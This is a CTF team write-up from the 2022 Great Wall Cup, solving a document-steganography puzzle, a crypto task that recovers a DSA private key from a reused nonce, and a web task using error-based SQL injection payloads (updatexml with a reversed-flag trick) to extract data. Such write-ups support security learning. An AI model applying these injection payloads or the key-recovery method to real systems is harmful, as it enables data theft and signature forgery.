[ CTF ] 【天格】 (Tiange) Team WriteUp: 2022 2nd "Great Wall Cup" (长城杯) Cybersecurity Competition

Published: 2023-01-04

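【Misc】签名簿 (Guestbook)

Just write anything and submit it.

【Misc】办公室爱情 (Office Romance)

The doc file contains two passwords. The first part is a white-on-white "password": select all and change the font colour to reveal it.
Rename the extension to zip and open document.xml, which holds all of the text; the two passwords are clearly visible there.
Concatenating them gives the password. We guessed wbStego4open steganography; decrypting yields a file that stores the archive password.
Extracting the archive gives a pptx file with coloured slides. The colours follow a pattern that can be read as base-7 numbers; convert them to decimal and then to ASCII.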

s='204a213a166a205a234a100a66a226a203a164a203a231a124a203a100a164a45a45a45a236a'
# Base-7 values separated by 'a'; skip the empty field after the trailing 'a'.
for i in s.split('a'):
    if i:
        print(chr(int(i,7)),end='')

flag{10ve_exCe1_!!!}

【Crypto】known_phi

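We are given n and phi and need to recover the factorization of n.
known_phi.py
Running it once yields the factorization of n; the flag is then recovered from the DSA signatures.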

import itertools
from Crypto.Util.number import inverse, long_to_bytes, bytes_to_long
from hashlib import sha256
from math import gcd
from random import randrange
from sage.all import is_prime

def factorize_multi_prime(N, phi):
    # Factor a multi-prime modulus N given phi(N), using non-trivial square roots of 1.
    prime_factors = set()
    factors = [N]
    while len(factors) > 0:
        # Element to factorize.
        N = factors[0]
        w = randrange(2, N - 1)
        i = 1
        while phi % (2 ** i) == 0:
            sqrt_1 = pow(w, phi // (2 ** i), N)
            if sqrt_1 > 1 and sqrt_1 != N - 1:
                # We can remove the element to factorize now, because we have a factorization.
                factors = factors[1:]
                p = gcd(N, sqrt_1 + 1)
                q = N // p

                if is_prime(p):
                    prime_factors.add(int(p))
                elif p > 1:
                    factors.append(int(p))

                if is_prime(q):
                    prime_factors.add(int(q))
                elif q > 1:
                    factors.append(int(q))

                # Continue in the outer loop
                break

            i += 1

    return tuple(prime_factors)

n = 104228256293611313959676852310116852553951496121352860038971098657350022997841589403091722735802150153734050783858816709247647536393314564077002364012463220999962114186339228164032217361145009468516448617173972835797623658266515762201804936729547278758839604969469770650218191574897316410254695420895895051693
phi = 104228256293611313959676852310116852553951496121352860038971098657350022997837434645707418205268240995284026522165519145773852565112344453740579163420312890001524537570675468046604347184376661743552799809753709321949095844960227307733389258381950812717245522599433727311919405966404418872873961877021696812800
n_factors = factorize_multi_prime(n, phi)

# DSA values from the challenge. r1 == r2, so both signatures used the same nonce k.
q = 24513014442114004234202354110477737650785387286781126308169912007819
s1 = 764450933738974696530033347966845551587903750431946039815672438603
r1 = 8881880595434882344509893789458546908449907797285477983407324325035
r2 = 8881880595434882344509893789458546908449907797285477983407324325035
s2 = 22099482232399385060035569388467035727015978742301259782677969649659
# n_factors = (92128261871628241975522014503893089775204276818952562864868068434189077323911, 112949642503320513342506215562619543574731838853984060837858943255064878544009, 87835491118288540715995802690214012778910595141140880257454164067662889225787, 114034877389817517986186253205403596431234414440955842208884285396147740113161)

# The order of the factors is not fixed, so try every assignment to the two messages.
for i in itertools.permutations([0,1,2,3]):
    m1 = long_to_bytes(n_factors[i[0]] + n_factors[i[1]])
    m2 = long_to_bytes(n_factors[i[2]] + n_factors[i[3]])
    hm1 = bytes_to_long(sha256(m1).digest())
    hm2 = bytes_to_long(sha256(m2).digest())
    # Shared nonce: k = (hm1 - hm2) / (s1 - s2) mod q
    k = inverse((s1-s2),q)*(hm1-hm2) % q
    # Private key: x = (s*k - hm) / r mod q
    x1 = (s1*k-hm1)*inverse(r1,q) % q
    x2 = (s2*k-hm2)*inverse(r2,q) % q
    if b'flag' in long_to_bytes(x1):
        print(long_to_bytes(x1))

flag{ea16de7-1981-11ed-b58f}
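
Why the DSA step above works, as an added example that is not part of the original writeup: r1 equals r2, so both signatures were produced with the same nonce k, and the two signing equations can be solved for k and then for the private key x. The toy group (p = 2039, q = 1019, g = 4), the key, the nonce and the messages are constructed for illustration, and the digest is reduced mod q only because the group is tiny.

```python
# Added illustration (not the challenge code). Toy DSA group, constructed for
# this example: p = 2q + 1 with q prime, g = 4 generates the order-q subgroup.
from hashlib import sha256

P, Q, G = 2039, 1019, 4

def digest(msg: bytes) -> int:
    return int.from_bytes(sha256(msg).digest(), "big") % Q

def sign(x: int, k: int, msg: bytes):
    """Textbook DSA with a caller-supplied nonce k (the flaw under study)."""
    r = pow(G, k, P) % Q
    s = pow(k, -1, Q) * (digest(msg) + x * r) % Q
    if r == 0 or s == 0:
        raise ValueError("degenerate signature, pick another nonce")
    return r, s

def verify(y: int, msg: bytes, sig) -> bool:
    r, s = sig
    if not (0 < r < Q and 0 < s < Q):
        return False
    w = pow(s, -1, Q)
    u1, u2 = digest(msg) * w % Q, r * w % Q
    return pow(G, u1, P) * pow(y, u2, P) % P % Q == r

def nonce_reused(sig_a, sig_b) -> bool:
    """r depends only on k, so equal r under one key means k was reused."""
    return sig_a[0] == sig_b[0]

def recover_private_key(msg1, sig1, msg2, sig2) -> int:
    """s1 - s2 = k^-1 (h1 - h2) mod q gives k; then x = (s1*k - h1) / r mod q."""
    (r, s1), (_, s2) = sig1, sig2
    if not nonce_reused(sig1, sig2) or s1 == s2:
        raise ValueError("signatures do not share a usable nonce")
    h1, h2 = digest(msg1), digest(msg2)
    k = (h1 - h2) * pow((s1 - s2) % Q, -1, Q) % Q
    return (s1 * k - h1) * pow(r, -1, Q) % Q

if __name__ == "__main__":
    x, k = 321, 777  # constructed private key and nonce
    m1, m2 = b"first message", b"second message"
    a, b = sign(x, k, m1), sign(x, k, m2)
    print(nonce_reused(a, b), recover_private_key(m1, a, m2, b) == x)
```

The same `nonce_reused` comparison is what a signer-side audit would run over stored signatures: any repeated r under one key means that key must be treated as compromised.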

【Web】djangogogo

Open the challenge and click submit.
Test the name parameter for SQL injection.
The SQL statement raises an error, so SQL injection is present.
Look at the error message:

(1064, "You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '' FROM
`Bill`.`purchase_date`))' at line 1")

The remainder of the statement after the injection point is

' FROM `Bill`.`purchase_date`))

Try to splice into it:

name=year from 1))--

The response is normal, so the splice worked.
Requesting name=month directly returns a hint.
It means the table name is flag, and the column is presumably flag as well.
Test:

year from (select flag from flag)))--

The response is normal.
SQL errors are echoed back, so error-based injection can be used directly:

month from (select updatexml(1, concat(1,(select flag from flag),1),1))))--

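Only half of the flag is visible because the echoed error has a length limit.
Outputting the flag reversed gives the other half: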

month from (select updatexml(1, concat(1,(select reverse(flag) from flag),1),1))))--